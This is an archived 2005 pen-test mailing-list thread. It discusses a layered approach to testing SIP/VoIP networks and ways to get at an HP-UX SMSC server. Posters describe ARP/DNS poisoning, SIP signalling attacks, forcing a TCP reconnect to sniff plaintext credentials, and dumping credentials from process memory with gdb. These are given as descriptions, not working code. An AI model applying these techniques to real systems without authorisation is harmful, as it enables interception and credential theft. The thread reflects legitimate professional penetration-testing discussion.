Re: Pentesting a SONUS / SIP Network

From: Mihai Amarandei (mihai@xmcopartners.com)
Date: Mon Jun 13 2005 - 10:58:40 EDT


 From my knowledge, up to now, no such real standards exists.
VOIPSA(VoIP Security Alliance – www.voipsa.org) is in the process of
developing a standard taxonomy that would be a base for defining VoIP
pen-test guidelines. But until then, pen-test in this domain is pretty
much left at the creativity of the pen-tester.
Several methodologies are possible , depending on the extent of your tests :

If you have to verify the entire VoIP infrastructure, you could try a
layered approach :

* physical layer(actually, i think you can skip this one, but I’d rather
mention it) : play with the wires and see what you can listen to

* network config/network devices layer(try the ARP/DNS poisoning, DHCP
insertion, etc)

* VoIP signaling protocols(SIP and SIP attacks) – testing attack
scenarios (SIP-Bye, SIP-Cancel, ID-Spoofing, etc)

* VoIP transport protocols(RTP) – here you can try mostly injection attacks

* application/os layer(search the applications/os evolved for known vulns)

This isn’t by all mean the only way to carry a SIP pen-test.

By the way, if anyone out there has others ideas on conducting such
tests, I’d love to hear more.

Mihai
Blog : http://secinternship.blogspot.com

Luis H. Gomez-Danes Mejia wrote:

>Hello,
>
>Does any body has any name of a standar to do a pen-tes to SIP/Network, Most
>of this network is on Unix flavor so I have a very good idea of what to do,
>I want to know if any of you knows any document or the name of the document
>to stablish a base line to carry out this task
>
>Thanks in advace.
>
>
>Luis H. Gomez-Danes Mejia
>GDM2000 Consulting
>Tel. 818 1159321
>Mob. 818 2800432
>lgomez@gdm2000.com.mx
>
>The information in this e-mail and attachment is confidential. It is
>intended only for the use of the individual or entity to which it is
>addressed and may contain information that is non-public, proprietary and
>may be legally privileged. If you have received this e-mail in error or are
>not the intended recipient, please immediately notify the sender by return
>e-mail and delete this message from your computer. Any use, distribution, or
>copying of this e-mail other than by the intended recipient is strictly
>prohibited.
>
>
>La información contenida en este correo electrónico y anexos es
>confidencial. Esta dirigida únicamente para el uso del individuo o entidad a
>la que fue dirigida y puede contener información propietaria que no es del
>dominio público. Si has recibido este correo por error o no eres el
>destinatario al que fue enviado, por favor notifica al remitente de
>inmediato y borra este mensaje de tu computadora. Cualquier uso,
>distribución o reproducción de este correo que no sea por el destinatario de
>intención queda prohibido.
>
>-----Original Message-----
>From: Sebastian Muñiz [mailto:smuniz@elinpar.com]
>Sent: Sunday, June 12, 2005 4:43 PM
>To: J. K.; pen-test@securityfocus.com
>Subject: RE: Pentesting a HP-UX with SMSC
>
>That's OK J.K... you had work to do ;)
>About SMSs, what you could try is to reset the TCP connection of the ESME to
>the SMSC so when it tries to reconnect, in the first data packet you will
>see the username/password in plain text.
>Good luck !!!!
>
>-----Mensaje original-----
>De: J. K. [mailto:pentest_ml@yahoo.com]
>Enviado el: Domingo, 12 de Junio de 2005 06:07 p.m.
>Para: pen-test@securityfocus.com
>Asunto: RE: Pentesting a HP-UX with SMSC
>
>
>Hello Sebastian,
>
>yes, I am pretty sure that I am dealing with a SMSC server. Beside the CIMD2
>banner that it provides, I found some hints in the machine I am connecting
>from (a DMZ host I previously took over) that suggest that we are talking
>about SMS traffic (even if it seems to be a testing environment: I see no
>SMSs when sniffing the network).
>
>I tried to fingerprint the server to figure out exactly what app is running
>there, but with no success.
>
>Anyway, I found an established connection between the client and this
>mysterious server app; my next step will be to attach gdb to the process
>owning that
>connection: my hope is that username and password are still somewhere in its
>memory space ;)
>
>Cheers
>
>j.k.
>
>P.s.: sorry for the late reply: in the last 3-4 days I focused on another
>part of the target network ;)
>
>--- Sebastian Muñiz <smuniz@elinpar.com> wrote:
>
>
>>This apps Do install default user/password but depends on the one that
>>you found....
>>You should try to indentify this one but thought SMSC has no tcp port
>>specially assigned to it, it won't help you unless this software
>>version is in the default port (and identifying the version of every
>>SMSC arround should be a very hard work)...
>>
>>If you want to connect to it, you should get an ESME (which is the
>>client that connects to a SMSC in this kind of Client-Server
>>architecture) but the protocol SMPP they use (Short Message Peer To
>>Peer) uses username and password (the password could be blank is the
>>SMSC admin wanted so).
>>Here I sent you a link to a page where you can find the SMPP protocol
>>specification and a ESME client made in java to test against this
>>server of yours.
>>
>>
>>
>http://opensmpp.logica.com/CommonPart/Download/download2.html
>
>
>>You could allways try to get the source code for this inplementation
>>(if this is available) and try to find bugs in it but it is a subject
>>for another post ;-)
>>
>>ohh... and i am not aware of any exploit arround for any
>>implementation of this protocol!!! :( But if you get one, let me know
>>:)
>>
>>anyway..... Are you sure it is an SMSC server that you found????
>>
>> Cheers, Sebastian
>>
>>-----Mensaje original-----
>>De: J. K. [mailto:pentest_ml@yahoo.com] Enviado el: Miércoles, 08 de
>>Junio de 2005 11:05 a.m.
>>Para: pen-test@securityfocus.com
>>Asunto: Pentesting a HP-UX with SMSC
>>
>>
>>Hello fellow pen-testers,
>>
>>in my current engagement I bumped into a HP-UX
>>(B.11.11) server protected by a firewall (not an internet facing
>>firewall, tho).
>>The only open ports I can connect to are telnet and 9971.
>>
>>Connecting to 9971 I get the following:
>>
>># telnet x.x.x.x 9971
>>Trying x.x.x.x...
>>Connected to x.x.x.x.
>>Escape character is '^]'.
>>CIMD2-A ConnectionInfo: SessionId = 32551 PortId = 4 Time =
>>050608153449 AccessType = TCPIP_SOCKET PIN =
>>630777
>>
>>Googling around, I found that this daemon should be a SMSC (Short
>>Message Service Center). I also found that on HP-UX there are a few
>>SMSC apps available (Locus,
>>FEELingK,...)
>>
>>My questions are:
>>1. Do you know of any vulnerability or attack avenue on this
>>protocol/service ?
>>2. Do you know if these SMSC apps install some default user whose
>>password I can try to guess ?
>>3. Any other idea ?
>>
>>Of course I could just fire off Hydra against the telnet server, but I
>>would like to find something less noisy ;)
>>
>>Thanks
>>
>>j.k.
>>
>>
>>
>>__________________________________
>>Discover Yahoo!
>>Have fun online with music videos, cool games, IM and more. Check it
>>out!
>>http://discover.yahoo.com/online.html
>>
>>
>>
>
>
>
>
>__________________________________
>Yahoo! Mail
>Stay connected, organized, and protected. Take the tour:
>http://tour.mail.yahoo.com/mailtour.html
>
>
>
>
>
>

-- 
Mihai Amarandei-Stavila - Xmco Partners
Consultant Sécurité / Test d'intrusion
tel  : 33 1 47 34 68 61
web  : http://www.xmcopartners.com
Villa Gabrielle 75015 PARIS


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:24 EDT